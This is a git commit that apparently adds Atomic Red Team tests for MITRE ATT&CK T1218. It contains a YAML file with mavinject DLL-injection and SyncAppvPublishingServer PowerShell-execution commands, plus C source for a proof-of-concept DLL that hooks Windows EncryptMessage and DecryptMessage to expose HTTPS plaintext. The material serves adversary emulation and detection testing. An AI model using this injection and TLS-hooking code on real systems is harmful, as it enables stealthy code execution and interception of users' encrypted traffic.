T1218 Signed Binary Proxy Execution (#413)

2018-12-04 18:37:48 -06:00
parent d2362a0d45
commit 943b36db5d
4 changed files with 189 additions and 0 deletions
@@ -0,0 +1,42 @@
+---
+attack_technique: T1218
+display_name: Signed Binary Proxy Execution
+
+atomic_tests:
+- name: mavinject - Inject DLL into running process
+  description: |
+    Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    dll_payload:
+      description: DLL to inject
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll
+    process_id:
+      description: PID of process receiving injection
+      type: string
+      default: 1000
+  executor:
+    name: command_prompt
+    command: |
+      mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
+
+- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
+  description: |
+    Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    powershell_code:
+      description: PowerShell code to execute
+      type: string
+      default: Start-Process calc.exe
+  executor:
+    name: command_prompt
+    command: |
+      SyncAppvPublishingServer.exe "n; #{powershell_code}"
@@ -0,0 +1,147 @@
+#define SECURITY_WIN32 //Define First Before Imports.
+
+#include <windows.h>
+#include <stdio.h>
+#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
+
+FARPROC fpEncryptMessage; //Pointer To The Original Location
+BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
+
+FARPROC fpDecryptMessage; //Pointer To The Original Location
+BYTE bSavedByte2; //Saved Byte Overwritten by 0xCC -
+
+
+// Original Idea/Reference Blog Post Here:
+// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
+// PoC by Casey Smith @subTee
+// From PowerShell
+// mavinject.exe $pid /INJECTRUNNING C:\AtomicTests\AtomicSSLHookx64.dll
+// curl https://www.example.com
+// Should Hook and Display Request/Response from HTTPS
+
+
+
+
+BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
+	DWORD dwOldProt = 0;
+	if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) {
+		return FALSE;
+	}
+	MoveMemory(fpFunc, b, size);
+
+	return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
+}
+
+//TODO, Combine  HOOK Function To take 2 params. DLL and Function Name.
+VOID HookFunction(VOID) {
+	fpEncryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "EncryptMessage");
+	if (fpEncryptMessage == NULL) {
+		return;
+	}
+
+	bSavedByte = *(LPBYTE)fpEncryptMessage;
+
+	const BYTE bInt3 = 0xCC;
+	if (WriteMemory(fpEncryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+}
+
+VOID HookFunction2(VOID) {
+	fpDecryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "DecryptMessage");
+	if (fpDecryptMessage == NULL) {
+		return;
+	}
+
+	bSavedByte2 = *(LPBYTE)fpDecryptMessage;
+
+	const BYTE bInt3 = 0xCC;
+	if (WriteMemory(fpDecryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+}
+
+SECURITY_STATUS MyEncryptMessage(
+	PCtxtHandle    phContext,
+	ULONG          fQOP,
+	PSecBufferDesc pMessage,
+	ULONG          MessageSeqNo
+)
+{
+
+	char* buffer = (char*)((DWORD_PTR)(pMessage->pBuffers->pvBuffer) + 0x29); //Just Hardcode for PoC
+
+	::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
+
+	if (WriteMemory(fpEncryptMessage, &bSavedByte, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+
+	SECURITY_STATUS SEC_EntryRet = EncryptMessage(phContext, fQOP, pMessage, MessageSeqNo);
+	HookFunction();
+	return SEC_EntryRet;
+}
+
+SECURITY_STATUS MyDecryptMessage(
+	PCtxtHandle    phContext,
+	PSecBufferDesc pMessage,
+	ULONG          MessageSeqNo,
+	ULONG          fQOP
+)
+{
+
+	if (WriteMemory(fpDecryptMessage, &bSavedByte2, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+
+	SECURITY_STATUS SEC_EntryRet = DecryptMessage(phContext, pMessage, MessageSeqNo, &fQOP );
+
+	char* buffer = (char*)(pMessage->pBuffers->pvBuffer);
+
+	::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
+
+	HookFunction2();
+	return SEC_EntryRet;
+}
+
+
+LONG WINAPI
+MyVectoredExceptionHandler1(
+	struct _EXCEPTION_POINTERS *ExceptionInfo
+)
+{
+		UNREFERENCED_PARAMETER(ExceptionInfo);
+#ifdef _WIN64
+	if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpEncryptMessage) {
+		ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyEncryptMessage;
+	}
+
+	if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpDecryptMessage) {
+		ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyDecryptMessage;
+	}
+
+#else
+	if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpEncryptMessage) {
+		ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyEncryptMessage;
+	}
+
+	if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpDecryptMessage) {
+		ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyDecryptMessage;
+	}
+
+#endif
+	return EXCEPTION_CONTINUE_SEARCH;
+}
+
+BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
+	switch (fdwReason) {
+	case DLL_PROCESS_ATTACH:
+		AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)MyVectoredExceptionHandler1);
+		HookFunction();
+		HookFunction2();
+		::MessageBoxA(NULL, "Locked and Loaded!", "Boom!", 0);
+		break;
+	}
+
+	return TRUE;
+}